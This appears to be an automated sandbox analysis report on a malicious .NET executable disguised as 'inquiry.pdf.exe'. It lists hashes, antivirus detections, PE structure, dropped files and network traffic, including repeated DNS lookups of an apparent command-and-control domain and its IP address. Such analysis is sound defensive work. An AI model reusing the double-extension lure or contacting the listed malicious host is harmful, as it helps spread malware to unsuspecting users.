                                                          SHA-512:88C121E4BB4274C71E6B9989ED4729F6A970CD5FDD28E08CEC99D7B3FBDCDCF11884F1815A69FB91FFD425FF633AE731686BB6D2B1E715A7D3D575612EE679CD
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.9N..............P..n............... ........@.. ....................................`....................................W.................................................................................... ............... ..H............text...4l... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B........................H.......P....s......n....M................................................(....*&..(.....*.s.........s ........s!........s"........*&........*&..(-....*".......*Vs!...(2...t.........*..(3...*~.(4.....s-...('...}'....(+....*&.{....+.*6..('...}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{..

                                                          C:\Users\user\AppData\Roaming\glonkjhg.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):823
                                                          Entropy (8bit):4.849820620027152
                                                          Encrypted:false
                                                          SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeT0sQpAFSkIrxMVlmJHaVzvv:/JdAokItULVDv
                                                          MD5:0E44BA60948680C2D34F551973EDCCBE
                                                          SHA1:6C4D1FADDD2F3E06FD61FE16EC634FCD50A7CAA6
                                                          SHA-256:F16318E0221AAAE070E68CD2D022600F5C2A1501B24375F422B16796F31EA63D
                                                          SHA-512:9100F51E910AC6BC35AF242B63AD8472BFB190461F340C2CB33873D05462954716669932736C1594CF738F856D2F0717FFA7E0E5032F4308197E45E3535657AF
                                                          Malicious:false
                                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 12, Received = 12, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):6.668579935043723
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:inquiry.pdf.exe
                                                          File size:686592
                                                          MD5:6236e43da1b2c6279760e6b2b7e2d40f
                                                          SHA1:a24221417ff9c0d169bf17b7f242824fe61d3b72
                                                          SHA256:b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
                                                          SHA512:88c121e4bb4274c71e6b9989ed4729f6a970cd5fdd28e08cec99d7b3fbdcdcf11884f1815a69fb91ffd425ff633ae731686bb6d2b1e715a7d3d575612ee679cd
                                                          SSDEEP:12288:1DSdV3qBgQeAnkclIfVfhWQBIJ0bnaQZPyIlEnuHCW:sdV3HQeAnN+F3FbEu
                                                          TLSH:EBE48D6F23D5AF70C17DF3BA3394B91113A5E5CBA210C7DB0A4585E8B723BC56A8D242
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.9N..............P..n............... ........@.. ....................................`................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4a8c2e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4E398062 [Wed Aug 3 17:07:46 2011 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa8bd40x57.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x60a.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xa6c340xa6e00False0.6306896652621723data6.679772249142144IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xaa0000x60a0x800False0.34716796875data3.6238763425012226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xac0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0xaa0a00x380data
                                                          RT_MANIFEST0xaa4200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2022 17:28:40.584846020 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:40.584929943 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:40.585051060 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:40.734116077 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:40.734179020 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:40.795495987 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:40.795675993 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:40.802371979 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:40.802409887 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:40.802769899 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:40.846744061 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.228228092 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.228255987 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.516992092 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517059088 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517091036 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517129898 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517175913 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.517205000 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517227888 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.517805099 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.517894030 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.517916918 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.519021988 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.519124985 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.519148111 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.520224094 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.520308971 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.520334005 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.521435022 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.521518946 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.521544933 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.534156084 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.534282923 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.534310102 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.534676075 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.534759998 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.534780025 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.535824060 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.535906076 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.535927057 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.537259102 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.537292957 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.537352085 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.537374020 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.537420034 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.538482904 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.539699078 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.539729118 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.539792061 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.539815903 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.539870977 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.540880919 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.542035103 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.542063951 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.542104959 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.542128086 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.542175055 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.543072939 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.544183969 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.544219017 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.544255972 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.544279099 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.544325113 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.545320988 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.546353102 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.546386957 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.546432972 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.546458960 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.546499968 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.547485113 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.548558950 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.548649073 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.548671007 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.548737049 CEST44349699142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:28:41.548785925 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:28:41.560120106 CEST49699443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.619597912 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.619666100 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:36.620533943 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.647135019 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.647180080 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:36.705720901 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:36.705907106 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.708970070 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:36.709007025 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:36.709566116 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:36.757956982 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:37.103657007 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:37.103739977 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.441360950 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.441466093 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.441523075 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.441524029 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:37.441566944 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.441608906 CEST49705443192.168.2.3142.250.203.100
                                                          Oct 3, 2022 17:29:37.441625118 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.442158937 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.442214966 CEST44349705142.250.203.100192.168.2.3
                                                          Oct 3, 2022 17:29:37.442225933 CEST49705443192.168.2.3142.250.203.100

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2022 17:28:40.540024042 CEST6270453192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:28:40.559189081 CEST53627048.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:29:36.573261976 CEST5799053192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:29:36.590500116 CEST53579908.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:30:30.254084110 CEST5238753192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:30:30.422929049 CEST53523878.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:30:36.808413029 CEST5692453192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:30:36.979670048 CEST53569248.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:30:43.343605042 CEST6062553192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:30:43.514852047 CEST53606258.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:30:50.139025927 CEST4930253192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:30:50.276540995 CEST53493028.8.8.8192.168.2.3
                                                          Oct 3, 2022 17:30:56.782484055 CEST5397553192.168.2.38.8.8.8
                                                          Oct 3, 2022 17:30:56.952225924 CEST53539758.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 3, 2022 17:28:40.540024042 CEST192.168.2.38.8.8.80x3d81Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:29:36.573261976 CEST192.168.2.38.8.8.80x809fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:30.254084110 CEST192.168.2.38.8.8.80x6f9cStandard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:36.808413029 CEST192.168.2.38.8.8.80xe730Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:43.343605042 CEST192.168.2.38.8.8.80xe4cdStandard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:50.139025927 CEST192.168.2.38.8.8.80xbde2Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:56.782484055 CEST192.168.2.38.8.8.80x4171Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 3, 2022 17:28:40.559189081 CEST8.8.8.8192.168.2.30x3d81No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:29:36.590500116 CEST8.8.8.8192.168.2.30x809fNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:30.422929049 CEST8.8.8.8192.168.2.30x6f9cNo error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:36.979670048 CEST8.8.8.8192.168.2.30xe730No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:43.514852047 CEST8.8.8.8192.168.2.30xe4cdNo error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:50.276540995 CEST8.8.8.8192.168.2.30xbde2No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                          Oct 3, 2022 17:30:56.952225924 CEST8.8.8.8192.168.2.30x4171No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.google.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349699142.250.203.100443C:\Users\user\Desktop\inquiry.pdf.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-10-03 15:28:41 UTC0OUTGET / HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: Keep-Alive
                                                          2022-10-03 15:28:41 UTC0INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:28:41 GMT
                                                          Expires: -1
                                                          Cache-Control: private, max-age=0
                                                          Content-Type: text/html; charset=ISO-8859-1
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Server: gws
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: AEC=AakniGNWZfgimimfVhqw9CfDOqnGP1vTToCig1K_-SLyPOOl3rxx4lxqdeM; expires=Sat, 01-Apr-2023 15:28:41 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: __Secure-ENID=7.SE=AFIKxW9QJiTUV8ZxzSNX3GGV6kwaBKfI9lpir0ygx5Ywy2s-ifT_-GdWChX6sQd5lX7qZFa1gN4fpWJrVvKWznXPej0FrcoIMsFM3kLrzou-r51s-JoawqlwD8N9qt3A5sIohbc8Juga8lbnUPl2fQhCpWpaVV11QRnZjg1nppM; expires=Fri, 03-Nov-2023 07:46:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: CONSENT=PENDING+540; expires=Wed, 02-Oct-2024 15:28:41 GMT; path=/; domain=.google.com; Secure
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2022-10-03 15:28:41 UTC1INData Raw: 35 34 63 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c
                                                          Data Ascii: 54c2<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html
                                                          2022-10-03 15:28:41 UTC1INData Raw: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 54 4d 69 41 57 6d 47 6d 39 4c 4a 45 6a 59 75 79 6d 4e 4a 39 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 71 66 38 36 59 39 65 51 46 63 48 59 31 73 51 50 34 50 43 4e 38 41 73 27 2c 6b
                                                          Data Ascii: ; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RTMiAWmGm9LJEjYuymNJ9A">(function(){window.google={kEI:'qf86Y9eQFcHY1sQP4PCN8As',k
